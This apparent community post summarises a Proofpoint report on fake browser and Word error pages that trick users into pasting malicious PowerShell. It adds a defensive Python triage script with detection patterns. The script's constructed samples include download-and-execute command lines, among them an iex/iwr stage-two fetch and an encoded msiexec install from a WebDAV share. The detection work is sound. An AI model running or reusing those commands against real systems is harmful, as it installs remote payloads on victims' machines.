Auth Lab Community

Fake Google Chrome Errors Trick Users into Running Malicious PowerShell Scripts

Security researchers at Proofpoint have identified several threat actors using fake error messages, styled as Google Chrome, Microsoft Word and OneDrive errors, to trick users into pasting and running malicious PowerShell scripts on their own machines.

The actors behind this activity include the ClearFake cluster and TA571. ClearFake has previously used website overlays to push fake browser updates carrying malware, while TA571 is known for high-volume spam email campaigns.

Proofpoint describes three attack chains that differ in their initial stages but converge on the same step: getting the victim to paste attacker-supplied code into a PowerShell console. In the ClearFake chain, a compromised website loads a malicious script that is retrieved from a smart contract on Binance's Smart Chain (the technique known as EtherHiding), which makes the payload hard to take down. The script displays a fake Google warning saying the page cannot be displayed correctly and tells the visitor to fix it by installing a "root certificate"; clicking the fix button copies a malicious PowerShell script to the Windows clipboard, and the page instructs the visitor to paste it into a "Windows PowerShell (Admin)" console and run it.

Once run, the PowerShell script performs several steps to confirm the device is a worthwhile target before committing to the infection: it flushes the DNS cache, clears the clipboard (so the pasted script is no longer there), displays a decoy message, and downloads a second PowerShell script that performs anti-VM checks before fetching an information stealer.

The second chain uses a script injected into a compromised website to draw an iframe overlay showing a fake Chrome error. The overlay instructs the user to open "Windows PowerShell (Admin)" and paste the provided code, which leads to the same infection process.

The third chain is email-based and uses HTML attachments that look like Word documents. The attachment claims the "Word Online" extension must be installed to view the document correctly and offers two options, "How to fix" and "Automatic fix". "How to fix" copies a base64-encoded PowerShell command to the clipboard and instructs the user to paste it into PowerShell.

"Automatic fix" uses the search-ms: protocol to open a Windows Explorer search view that lists a "fix.msi" or "fix.vbs" file hosted on an attacker-controlled WebDAV share. In either case the PowerShell command downloads and executes an MSI file or a VBS script, leading to a Matanbuchus or DarkGate infection respectively.

Proofpoint notes that these attacks rely on users not recognising the risk of running commands they did not write, and on the fact that a user pasting and executing a command in their own elevated console is a legitimate action that Windows does not, by itself, block. The payloads observed include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, ClipboardHijacker, and Lumma Stealer. Although the chain requires considerable user interaction, each step is presented convincingly enough that users follow it. For defenders, the chain does leave a distinctive trace in PowerShell script block logging and process-creation telemetry: an interactive, elevated console that flushes DNS, clears the clipboard and pulls a remote script in quick succession.
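As an added example (not code from the article, from Proofpoint, or from the attackers), the following Python triage helper shows what the chain above looks like to a defender. It takes PowerShell command lines or script-block text as you would pull them from Sysmon process-creation events or PowerShell ScriptBlock logging (Event ID 4104), decodes any -EncodedCommand blob (base64 of UTF-16LE text), and scores the behaviours the article lists: DNS flush, clipboard wipe, download cradle fed to iex, MSI/VBS launch, search-ms: URIs and WebDAV UNC paths. All sample script blocks, hosts (192.0.2.x is a documentation range) and file names are constructed, and the indicator patterns are assumptions to tune against your own baseline.

```python
"""
Triage helper for PowerShell command lines and script blocks (e.g. Sysmon
Event 1 command lines, PowerShell ScriptBlock logging Event ID 4104).
Flags the paste-and-run chain described in the article: DNS cache flush,
clipboard wipe, download of a second-stage script fed to iex, and an MSI/VBS
launched from an attacker WebDAV share, possibly hidden in -EncodedCommand.
Added example, not Proofpoint's or the attackers' code; all samples are constructed.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One pattern per behaviour named in the article. These are assumptions for
# illustration: broad on purpose, to be tuned against your own baseline.
INDICATORS = {
    "dns_flush":       re.compile(r"ipconfig(\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_wipe":  re.compile(r"Set-Clipboard|Forms\.Clipboard\]::Clear|\|\s*clip(\.exe)?\b", re.I),
    "download_cradle": re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Start-BitsTransfer)\b", re.I),
    "dynamic_exec":    re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "msi_or_vbs":      re.compile(r"msiexec(\.exe)?\s+/i|\bwscript(\.exe)?\s|\.(msi|vbs)\b", re.I),
    "search_ms":       re.compile(r"search-ms:", re.I),
    "webdav_unc":      re.compile(r"\\\\[\w.\-]+@\d+\\|\\\\[\w.\-]+\\DavWWWRoot", re.I),
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob; PowerShell expects
# base64 of the UTF-16LE command text. -ExecutionPolicy, -ea, -eq do not match.
ENCODED_RX = re.compile(r"-e(?:c|n[a-z]*)?\s+(?P<b64>[A-Za-z0-9+/]{16,}={0,2})", re.I)


def encode_powershell(command: str) -> str:
    """Produce what `powershell -EncodedCommand` expects: base64 of UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse encode_powershell; None if the blob is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Triage:
    script_block: str
    decoded: Optional[str]
    hits: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Three independent chain behaviours, or a download cradle feeding
        # iex/Invoke-Expression, is well beyond routine administration.
        return len(self.hits) >= 3 or {"download_cradle", "dynamic_exec"} <= set(self.hits)


def triage_script_block(script_block: str) -> Triage:
    """Decode any -EncodedCommand payload, then score the visible text plus the payload."""
    m = ENCODED_RX.search(script_block)
    decoded = decode_encoded_command(m.group("b64")) if m else None
    # Cut the base64 blob out of the visible text so base64 noise cannot hit a pattern.
    visible = script_block if m is None else script_block[:m.start("b64")] + script_block[m.end("b64"):]
    haystack = visible if decoded is None else visible + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.append("encoded_command")
    return Triage(script_block, decoded, hits)


# Constructed samples (not real captures); 192.0.2.0/24 is a documentation range.
SAMPLE_SCRIPT_BLOCKS = [
    # Routine admin work: no chain behaviour at all.
    "Get-ChildItem C:\\Logs -Recurse | Where-Object { $_.Length -gt 1MB } | Sort-Object Length",
    # A help-desk step on its own: one indicator, not enough to alert.
    "ipconfig /flushdns",
    # The clipboard paste-and-run chain as the article describes it.
    "ipconfig /flushdns; Set-Clipboard -Value ' '; Write-Host 'Root certificate installed'; "
    "iex (iwr -UseBasicParsing 'http://192.0.2.10/stage2.ps1').Content",
    # 'How to fix' variant: the same idea hidden in a base64 -enc blob that runs an MSI from WebDAV.
    "powershell -nop -w hidden -enc " + encode_powershell(
        "msiexec /i \\\\192.0.2.25@80\\DavWWWRoot\\fix.msi /qn"),
]


def triage_all(blocks: List[str]) -> List[Triage]:
    return [triage_script_block(b) for b in blocks]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_SCRIPT_BLOCKS):
        flag = "SUSPICIOUS" if r.suspicious else "ok"
        print(f"{flag:10} {r.hits} :: {r.script_block[:60]}")
```

The point of scoring on combinations rather than single patterns is that each behaviour on its own (a DNS flush, a `-EncodedCommand`, a download) is common in legitimate administration; it is the sequence the article describes, arriving together in one interactive console, that is the signal. Running the indicators over the decoded payload as well as the visible command line is what catches the "How to fix" variant, where the interesting part is base64.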

Reference:
BleepingComputer, "Fake Google Chrome errors trick you into running malicious PowerShell scripts"